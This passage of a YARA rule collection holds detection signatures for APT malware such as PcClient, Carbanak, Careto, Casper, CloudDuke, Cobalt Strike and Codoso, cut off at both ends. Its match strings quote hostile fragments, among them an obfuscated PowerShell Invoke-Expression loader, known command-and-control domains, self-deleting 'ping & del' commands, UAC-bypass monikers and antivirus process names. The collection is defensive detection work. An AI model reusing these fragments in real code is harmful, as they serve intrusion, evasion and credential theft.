wide $s8 = "AuthType: " fullword ascii $s9 = ".no_proxies_on\", \"" fullword wide condition: uint16(0) == 0x5a4d and filesize < 853KB and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule apt_c16_win_memory_pcclient { meta: author = "@dragonthreatlab" md5 = "ec532bbe9d0882d403473102e9724557" description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check." date = "2015/01/11" reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html" strings: $str1 = "Kill You" ascii $str2 = "%4d-%02d-%02d %02d:%02d:%02d" ascii $str3 = "%4.2f KB" ascii $encodefunc = {8A 08 32 CA 02 CA 88 08 40 4E 75 F4} condition: all of them } rule apt_c16_win_disk_pcclient { meta: author = "@dragonthreatlab" md5 = "55f84d88d84c221437cd23cdbc541d2e" description = "Encoded version of pcclient found on disk" date = "2015/01/11" reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html" strings: $header = {51 5C 96 06 03 06 06 06 0A 06 06 06 FF FF 06 06 BE 06 06 06 06 06 06 06 46 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 EE 06 06 06 10 1F BC 10 06 BA 0D D1 25 BE 05 52 D1 25 5A 6E 6D 73 26 76 74 6F 67 74 65 71 26 63 65 70 70 6F 7A 26 64 69 26 74 79 70 26 6D 70 26 4A 4F 53 26 71 6F 6A 69 30 11 11 0C 2A 06 06 06 06 06 06 06 73 43 96 1B 37 24 00 4E 37 24 00 4E 37 24 00 4E BA 40 F6 4E 39 24 00 4E 5E 41 FA 4E 33 24 00 4E 5E 41 FC 4E 39 24 00 4E 37 24 FF 4E 0D 24 00 4E FA 31 A3 4E 40 24 00 4E DF 41 F9 4E 36 24 00 4E F6 2A FE 4E 38 24 00 4E DF 41 FC 4E 38 24 00 4E 54 6D 63 6E 37 24 00 4E 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 56 49 06 06 52 05 09 06 5D 87 8C 5A 06 06 06 06 06 06 06 06 E6 06 10 25 0B 05 08 06 06 1C 06 06 06 1A 06 06 06 06 06 06 E5 27 06 06 06 16 06 06 06 36 06 06 06 06 06 16 06 16 06 06 06 04 06 06 0A 06 06 06 06 06 06 06 0A 06 06 06 06 06 06 06 06 76 06 06 06 0A 06 06 06 06 06 06 04 06 06 06 06 06 16 06 06 16 06 06} condition: $header at 0 } rule apt_c16_win32_dropper { meta: author = "@dragonthreatlab" md5 = "ad17eff26994df824be36db246c8fb6a" description = "APT malware used to drop PcClient RAT" date = "2015/01/11" reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html" strings: $mz = {4D 5A} $str1 = "clbcaiq.dll" ascii $str2 = "profapi_104" ascii $str3 = "/ShowWU" ascii $str4 = "Software\\Microsoft\\Windows\\CurrentVersion\\" ascii $str5 = {8A 08 2A CA 32 CA 88 08 40 4E 75 F4 5E} condition: $mz at 0 and all of ($str*) } rule apt_c16_win_swisyn { meta: author = "@dragonthreatlab" md5 = "a6a18c846e5179259eba9de238f67e41" description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check." date = "2015/01/11" reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html" strings: $mz = {4D 5A} $str1 = "/ShowWU" ascii $str2 = "IsWow64Process" $str3 = "regsvr32 " $str4 = {8A 11 2A 55 FC 8B 45 08 88 10 8B 4D 08 8A 11 32 55 FC 8B 45 08 88 10} condition: $mz at 0 and all of ($str*) } rule apt_c16_win_wateringhole { meta: author = "@dragonthreatlab" description = "Detects code from APT wateringhole" date = "2015/01/11" reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html" strings: $str1 = "function runmumaa()" $str2 = "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(" $str3 = "function MoSaklgEs7(k)" condition: any of ($str*) } rule apt_c16_win64_dropper { meta: author = "@dragonthreatlab" date = "2015/01/11" description = "APT malware used to drop PcClient RAT" reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html" strings: $mz = { 4D 5A } $str1 = "clbcaiq.dll" ascii $str2 = "profapi_104" ascii $str3 = "\\Microsoft\\wuauclt\\wuauclt.dat" ascii $str4 = { 0F B6 0A 48 FF C2 80 E9 03 80 F1 03 49 FF C8 88 4A FF 75 EC } condition: $mz at 0 and all of ($str*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2015-09-03 Identifier: Carbanak Rules */ /* Rule Set ----------------------------------------------------------------- */ rule Carbanak_0915_1 { meta: description = "Carbanak Malware" author = "Florian Roth" reference = "https://www.csis.dk/en/csis/blog/4710/" date = "2015-09-03" score = 70 strings: $s1 = "evict1.pdb" fullword ascii $s2 = "http://testing.corp 0" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and 1 of them } rule Carbanak_0915_2 { meta: description = "Carbanak Malware" author = "Florian Roth" reference = "https://www.csis.dk/en/csis/blog/4710/" date = "2015-09-03" score = 70 strings: $x1 = "8Rkzy.exe" fullword wide $s1 = "Export Template" fullword wide $s2 = "Session folder with name '%s' already exists." fullword ascii $s3 = "Show Unconnected Endpoints (Ctrl+U)" fullword ascii $s4 = "Close All Documents" fullword wide $s5 = "Add &Resource" fullword ascii $s6 = "PROCEXPLORER" fullword wide /* Goodware String - occured 1 times */ $s7 = "AssocQueryKeyA" fullword ascii /* Goodware String - occured 4 times */ condition: uint16(0) == 0x5a4d and filesize < 500KB and ( $x1 or all of ($s*) ) } rule Carbanak_0915_3 { meta: description = "Carbanak Malware" author = "Florian Roth" reference = "https://www.csis.dk/en/csis/blog/4710/" date = "2015-09-03" score = 70 strings: $s1 = "wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww" fullword ascii $s2 = "SHInvokePrinterCommandA" fullword ascii $s3 = "Ycwxnkaj" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 700KB and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Careto_SGH { meta: author = "AlienVault (Alberto Ortega)" description = "TheMask / Careto SGH component signature" reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf" date = "2014/02/11" strings: $m1 = "PGPsdkDriver" ascii wide fullword $m2 = "jpeg1x32" ascii wide fullword $m3 = "SkypeIE6Plugin" ascii wide fullword $m4 = "CDllUninstall" ascii wide fullword condition: 2 of them } rule Careto_OSX_SBD { meta: author = "AlienVault (Alberto Ortega)" description = "TheMask / Careto OSX component signature" reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf" date = "2014/02/11" strings: /* XORed "/dev/null strdup() setuid(geteuid())" */ $1 = {FF 16 64 0A 7E 1A 63 4D 21 4D 3E 1E 60 0F 7C 1A 65 0F 74 0B 3E 1C 7F 12} condition: all of them } rule Careto_CnC { meta: author = "AlienVault (Alberto Ortega)" description = "TheMask / Careto CnC communication signature" reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf" date = "2014/02/11" strings: $1 = "cgi-bin/commcgi.cgi" ascii wide $2 = "Group" ascii wide $3 = "Install" ascii wide $4 = "Bn" ascii wide condition: all of them } rule Careto_CnC_domains { meta: author = "AlienVault (Alberto Ortega)" description = "TheMask / Careto known command and control domains" reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf" date = "2014/02/11" strings: $1 = "linkconf.net" ascii wide nocase $2 = "redirserver.net" ascii wide nocase $3 = "swupdt.com" ascii wide nocase condition: any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Casper_Backdoor_x86 { meta: description = "Casper French Espionage Malware - Win32/ProxyBot.B - x86 Payload http://goo.gl/VRJNLo" author = "Florian Roth" reference = "http://goo.gl/VRJNLo" date = "2015/03/05" hash = "f4c39eddef1c7d99283c7303c1835e99d8e498b0" score = 80 strings: $s1 = "\"svchost.exe\"" fullword wide $s2 = "firefox.exe" fullword ascii $s3 = "\"Host Process for Windows Services\"" fullword wide $x1 = "\\Users\\*" fullword ascii $x2 = "\\Roaming\\Mozilla\\Firefox\\Profiles\\*" fullword ascii $x3 = "\\Mozilla\\Firefox\\Profiles\\*" fullword ascii $x4 = "\\Documents and Settings\\*" fullword ascii $y1 = "%s; %S=%S" fullword wide $y2 = "%s; %s=%s" fullword ascii $y3 = "Cookie: %s=%s" fullword ascii $y4 = "http://%S:%d" fullword wide $z1 = "http://google.com/" fullword ascii $z2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MALC)" fullword ascii $z3 = "Operating System\"" fullword wide condition: ( all of ($s*) ) or ( 3 of ($x*) and 2 of ($y*) and 2 of ($z*) ) } rule Casper_EXE_Dropper { meta: description = "Casper French Espionage Malware - Win32/ProxyBot.B - Dropper http://goo.gl/VRJNLo" author = "Florian Roth" reference = "http://goo.gl/VRJNLo" date = "2015/03/05" hash = "e4cc35792a48123e71a2c7b6aa904006343a157a" score = 80 strings: $s0 = "<Command>" fullword ascii $s1 = "</Command>" fullword ascii $s2 = "\" /d \"" fullword ascii $s4 = "'%s' %s" fullword ascii $s5 = "nKERNEL32.DLL" fullword wide $s6 = "@ReturnValue" fullword wide $s7 = "ID: 0x%x" fullword ascii $s8 = "Name: %S" fullword ascii condition: 7 of them } rule Casper_Included_Strings { meta: description = "Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo" author = "Florian Roth" reference = "http://goo.gl/VRJNLo" date = "2015/03/06" score = 50 strings: $a0 = "cmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST" $a1 = "& SYSTEMINFO) ELSE EXIT" $mz = { 4d 5a } $c1 = "domcommon.exe" wide fullword // File Name $c2 = "jpic.gov.sy" fullword // C2 Server $c3 = "aiomgr.exe" wide fullword // File Name $c4 = "perfaudio.dat" fullword // Temp File Name $c5 = "Casper_DLL.dll" fullword // Name $c6 = { 7B 4B 59 DE 37 4A 42 26 59 98 63 C6 2D 0F 57 40 } // Decryption Key $c7 = "{4216567A-4512-9825-7745F856}" fullword // Mutex condition: all of ($a*) or ( $mz at 0 ) and ( 1 of ($c*) ) } rule Casper_SystemInformation_Output { meta: description = "Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo" author = "Florian Roth" reference = "http://goo.gl/VRJNLo" date = "2015/03/06" score = 70 strings: $a0 = "***** SYSTEM INFORMATION ******" $a1 = "***** SECURITY INFORMATION ******" $a2 = "Antivirus: " $a3 = "Firewall: " $a4 = "***** EXECUTION CONTEXT ******" $a5 = "Identity: " $a6 = "<CONFIG TIMESTAMP=" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2015-08-08 Identifier: Cheshire Cat Version: 0.1 */ /* Rule Set ----------------------------------------------------------------- */ rule CheshireCat_Sample2 { meta: description = "Auto-generated rule - file dc18850d065ff6a8364421a9c8f9dd5fcce6c7567f4881466cee00e5cd0c7aa8" author = "Florian Roth" reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/" date = "2015-08-08" score = 70 hash = "dc18850d065ff6a8364421a9c8f9dd5fcce6c7567f4881466cee00e5cd0c7aa8" strings: $s0 = "mpgvwr32.dll" fullword ascii $s1 = "Unexpected failure of wait! (%d)" fullword ascii $s2 = "\"%s\" /e%d /p%s" fullword ascii $s4 = "error in params!" fullword ascii $s5 = "sscanf" fullword ascii $s6 = "<>Param : 0x%x" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and 4 of ($s*) } /* Generic Rules ----------------------------------------------------------- */ /* Gen1 is more exact than Gen2 - until now I had no FPs with Gen2 */ rule CheshireCat_Gen1 { meta: description = "Auto-generated rule - file ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300" author = "Florian Roth" reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/" date = "2015-08-08" super_rule = 1 score = 90 hash1 = "ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300" hash2 = "32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a" hash3 = "63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb" hash4 = "c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532" strings: $x1 = "CAPESPN.DLL" fullword wide $x2 = "WINF.DLL" fullword wide $x3 = "NCFG.DLL" fullword wide $x4 = "msgrthlp.dll" fullword wide $x5 = "Local\\{c0d9770c-9841-430d-b6e3-575dac8a8ebf}" fullword ascii $x6 = "Local\\{1ef9f94a-5664-48a6-b6e8-c3748db459b4}" fullword ascii $a1 = "Interface\\%s\\info" fullword ascii $a2 = "Interface\\%s\\info\\%s" fullword ascii $a3 = "CLSID\\%s\\info\\%s" fullword ascii $a4 = "CLSID\\%s\\info" fullword ascii $b1 = "Windows Shell Icon Handler" fullword wide $b2 = "Microsoft Shell Icon Handler" fullword wide $s1 = "\\StringFileInfo\\%s\\FileVersion" fullword ascii $s2 = "CLSID\\%s\\AuxCLSID" fullword ascii $s3 = "lnkfile\\shellex\\IconHandler" fullword ascii $s4 = "%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT" fullword ascii $s5 = "%sMutex" fullword ascii $s6 = "\\ShellIconCache" fullword ascii $s7 = "+6Service Pack " fullword ascii condition: uint16(0) == 0x5a4d and filesize < 350KB and 7 of ($s*) and 2 of ($a*) and 1 of ($b*) and 1 of ($x*) } rule CheshireCat_Gen2 { meta: description = "Auto-generated rule - from files 32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a, 63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb" author = "Florian Roth" reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/" date = "2015-08-08" super_rule = 1 score = 70 hash1 = "ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300" hash2 = "32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a" hash3 = "63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb" hash4 = "c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532" strings: $a1 = "Interface\\%s\\info" fullword ascii $a2 = "Interface\\%s\\info\\%s" fullword ascii $a3 = "CLSID\\%s\\info\\%s" fullword ascii $a4 = "CLSID\\%s\\info" fullword ascii $b1 = "Windows Shell Icon Handler" fullword wide $b2 = "Microsoft Shell Icon Handler" fullword wide $s1 = "\\StringFileInfo\\%s\\FileVersion" fullword ascii $s2 = "CLSID\\%s\\AuxCLSID" fullword ascii $s3 = "lnkfile\\shellex\\IconHandler" fullword ascii $s4 = "%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT" fullword ascii $s5 = "%sMutex" fullword ascii $s6 = "\\ShellIconCache" fullword ascii $s7 = "+6Service Pack " fullword ascii condition: uint16(0) == 0x5a4d and filesize < 200KB and 7 of ($s*) and 2 of ($a*) and 1 of ($b*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule CloudDuke_Malware { meta: description = "Detects CloudDuke Malware" author = "Florian Roth" reference = "https://www.f-secure.com/weblog/archives/00002822.html" date = "2015-07-22" score = 60 hash1 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7" hash2 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f" hash3 = "1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7" hash4 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7" hash5 = "1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7" hash6 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f" hash7 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46" hash8 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7" hash9 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46" hash10 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145" hash11 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004" hash12 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e" hash13 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145" hash14 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004" hash15 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e" strings: $s1 = "ProcDataWrap" fullword ascii $s2 = "imagehlp.dll" fullword ascii $s3 = "dnlibsh" fullword ascii $s4 = "%ws_out%ws" fullword wide $s5 = "Akernel32.dll" fullword wide $op0 = { 0f b6 80 68 0e 41 00 0b c8 c1 e1 08 0f b6 c2 8b } /* Opcode */ $op1 = { 8b ce e8 f8 01 00 00 85 c0 74 41 83 7d f8 00 0f } /* Opcode */ $op2 = { e8 2f a2 ff ff 83 20 00 83 c8 ff 5f 5e 5d c3 55 } /* Opcode */ condition: uint16(0) == 0x5a4d and filesize < 720KB and 4 of ($s*) and 1 of ($op*) } rule SFXRAR_Acrotray { meta: description = "Most likely a malicious file acrotray in SFX RAR / CloudDuke APT 5442.1.exe, 5442.2.exe" author = "Florian Roth" reference = "https://www.f-secure.com/weblog/archives/00002822.html" date = "2015-07-22" super_rule = 1 score = 70 hash1 = "51e713c7247f978f5836133dd0b8f9fb229e6594763adda59951556e1df5ee57" hash2 = "5d695ff02202808805da942e484caa7c1dc68e6d9c3d77dc383cfa0617e61e48" hash3 = "56531cc133e7a760b238aadc5b7a622cd11c835a3e6b78079d825d417fb02198" strings: $s1 = "winrarsfxmappingfile.tmp" fullword wide /* PEStudio Blacklist: strings */ $s2 = "GETPASSWORD1" fullword wide /* PEStudio Blacklist: strings */ $s3 = "acrotray.exe" fullword ascii $s4 = "CryptUnprotectMemory failed" fullword wide /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 2449KB and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Cobalt_functions { meta: author="@j0sm1" url="https://www.securityartwork.es/2017/06/16/analisis-del-powershell-usado-fin7/" description="Detect functions coded with ROR edi,D; Detect CobaltStrike used by differents groups APT" strings: $h1={58 A4 53 E5} // VirtualAllocEx $h2={4C 77 26 07} // LoadLibraryEx $h3={6A C9 9C C9} // DNSQuery_UTF8 $h4={44 F0 35 E0} // Sleep $h5={F4 00 8E CC} // lstrlen condition: 2 of ( $h* ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2016-01-30 Identifier: Codoso Comment: Reduced signature set for LOKI integration */ /* Rule Set ----------------------------------------------------------------- */ rule Codoso_PlugX_3 { meta: description = "Detects Codoso APT PlugX Malware" author = "Florian Roth" reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" date = "2016-01-30" hash = "74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3" strings: $s1 = "Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password." fullword wide $s2 = "mcs.exe" fullword ascii $s3 = "McAltLib.dll" fullword ascii $s4 = "WinRAR self-extracting archive" fullword wide condition: uint16(0) == 0x5a4d and filesize < 1200KB and all of them } rule Codoso_PlugX_2 { meta: description = "Detects Codoso APT PlugX Malware" author = "Florian Roth" reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" date = "2016-01-30" hash = "b9510e4484fa7e3034228337768176fce822162ad819539c6ca3631deac043eb" strings: $s1 = "%TEMP%\\HID" fullword wide $s2 = "%s\\hid.dll" fullword wide $s3 = "%s\\SOUNDMAN.exe" fullword wide $s4 = "\"%s\\SOUNDMAN.exe\" %d %d" fullword wide $s5 = "%s\\HID.dllx" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 400KB and 3 of them ) or all of them } rule Codoso_CustomTCP_4 { meta: description = "Detects Codoso APT CustomTCP Malware" author = "Florian Roth" reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" date = "2016-01-30" hash1 = "ea67d76e9d2e9ce3a8e5f80ff9be8f17b2cd5b1212153fdf36833497d9c060c0" hash2 = "130abb54112dd47284fdb169ff276f61f2b69d80ac0a9eac52200506f147b5f8" hash3 = "3ea6b2b51050fe7c07e2cf9fa232de6a602aa5eff66a2e997b25785f7cf50daa" hash4 = "02cf5c244aebaca6195f45029c1e37b22495609be7bdfcfcd79b0c91eac44a13" strings: $x1 = "varus_service_x86.dll" fullword ascii $s1 = "/s %s /p %d /st %d /rt %d" fullword ascii $s2 = "net start %%1" fullword ascii $s3 = "ping 127.1 > nul" fullword ascii $s4 = "McInitMISPAlertEx" fullword ascii $s5 = "sc start %%1" fullword ascii $s6 = "net stop %%1" fullword ascii $s7 = "WorkerRun" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 400KB and 5 of them ) or ( $x1 and 2 of ($s*) ) } rule Codoso_CustomTCP_3 { meta: description = "Detects Codoso APT CustomTCP Malware" author = "Florian Roth" reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" date = "2016-01-30" hash = "d66106ec2e743dae1d71b60a602ca713b93077f56a47045f4fc9143aa3957090" strings: $s1 = "DnsApi.dll" fullword ascii $s2 = "softWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\%s" ascii $s3 = "CONNECT %s:%d hTTP/1.1" ascii $s4 = "CONNECT %s:%d HTTp/1.1" ascii $s5 = "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0;)" ascii $s6 = "iphlpapi.dll" ascii $s7 = "%systemroot%\\Web\\" ascii $s8 = "Proxy-Authorization: Negotiate %s" ascii $s9 = "CLSID\\{%s}\\InprocServer32" ascii condition: ( uint16(0) == 0x5a4d and filesize < 500KB and 5 of them ) or 7 of them } rule Codoso_CustomTCP_2 { meta: description = "Detects Codoso APT CustomTCP Malware" author = "Florian Roth" reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" date = "2016-01-30" hash = "3577845d71ae995762d4a8f43b21ada49d809f95c127b770aff00ae0b64264a3" strings: $s1 = "varus_service_x86.dll" fullword ascii $s2 = "/s %s /p %d /st %d /rt %d" fullword ascii $s3 = "net start %%1" fullword ascii $s4 = "ping 127.1 > nul" fullword ascii $s5 = "McInitMISPAlertEx" fullword ascii $s6 = "sc start %%1" fullword ascii $s7 = "B_WKNDNSK^" fullword ascii $s8 = "net stop %%1" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 406KB and all of them } rule Codoso_PGV_PVID_6 { meta: description = "Detects Codoso APT PGV_PVID Malware" author = "Florian Roth" reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" date = "2016-01-30" hash = "4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f" strings: $s0 = "rundll32 \"%s\",%s" fullword ascii $s1 = "/c ping 127.%d & del \"%s\"" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 6000KB and all of them } rule Codoso_Gh0st_3 { meta: description = "Detects Codoso APT Gh0st Malware" author = "Florian Roth" reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" date = "2016-01-30" hash = "bf52ca4d4077ae7e840cf6cd11fdec0bb5be890ddd5687af5cfa581c8c015fcd" strings: $x1 = "RunMeByDLL32" fullword ascii $s1 = "svchost.dll" fullword wide $s2 = "server.dll" fullword ascii $s3 = "Copyright ? 2008" fullword wide $s4 = "testsupdate33" fullword ascii $s5 = "Device Protect Application" fullword wide $s6 = "MSVCP60.DLL" fullword ascii /* Goodware String - occured 1 times */ $s7 = "mail-news.eicp.net" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 195KB and $x1 or 4 of them } rule Codoso_Gh0st_2 { meta: description = "Detects Codoso APT Gh0st Malware" author = "Florian Roth" reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" date = "2016-01-30" hash = "5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841" strings: $s0 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" fullword ascii $s1 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii $s13 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide $s14 = "%s -r debug 1" fullword ascii $s15 = "\\\\.\\keymmdrv1" fullword ascii $s17 = "RunMeByDLL32" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 500KB and 1 of them } rule Codoso_CustomTCP { meta: description = "Codoso CustomTCP Malware" author = "Florian Roth" reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" date = "2016-01-30" hash = "b95d7f56a686a05398198d317c805924c36f3abacbb1b9e3f590ec0d59f845d8" strings: $s4 = "wnyglw" fullword ascii $s5 = "WorkerRun" fullword ascii $s7 = "boazdcd" fullword ascii $s8 = "wayflw" fullword ascii $s9 = "CODETABL" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 405KB and all of them } /* Super Rules ------------------------------------------------------------- */ rule Codoso_PGV_PVID_5 { meta: description = "Detects Codoso APT PGV PVID Malware" author = "Florian Roth" reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" date = "2016-01-30" super_rule = 1 hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75" hash2 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe" strings: $s1 = "/c del %s >> NUL" fullword ascii $s2 = "%s%s.manifest" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 500KB and all of them } rule Codoso_Gh0st_1 { meta: description = "Detects Codoso APT Gh0st Malware" author = "Florian Roth" reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" date = "2016-01-30" super_rule = 1 hash1 = "5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841" hash2 = "7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8" hash3 = "d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297" strings: $x1 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" fullword ascii $x2 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii $x3 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide $x4 = "\\\\.\\keymmdrv1" fullword ascii $s1 = "spideragent.exe" fullword ascii $s2 = "AVGIDSAgent.exe" fullword ascii $s3 = "kavsvc.exe" fullword ascii $s4 = "mspaint.exe" fullword ascii $s5 = "kav.exe" fullword ascii $s6 = "avp.exe" fullword ascii $s7 = "NAV.exe" fullword ascii $c1 = "Elevation:Administrator!new:" wide $c2 = "Global\\RUNDLL32EXITEVENT_NAME{12845-8654-543}" fullword ascii $c3 = "\\sysprep\\sysprep.exe" fullword wide $c4 = "\\sysprep\\CRYPTBASE.dll" fullword wide $c5 = "Global\\TERMINATEEVENT_NAME{12845-8654-542}" fullword ascii $c6 = "ConsentPromptBehaviorAdmin" fullword ascii $c7 = "\\sysprep" fullword wide $c8 = "Global\\UN{5FFC0C8B-8BE5-49d5-B9F2-BCDC8976EE10}" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1000KB and ( 4 of ($s*) or 4 of ($c*) ) or 1 of ($x*) or 6 of ($c*) } rule Codoso_PGV_PVID_4 { meta: description = "Detects Codoso APT PlugX Malware" author = "Florian Roth" reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" date = "2016-01-30" super_rule = 1 hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75" hash2 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761" hash3 = "b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1" hash4 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3" hash5 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe" strings: $x1 = 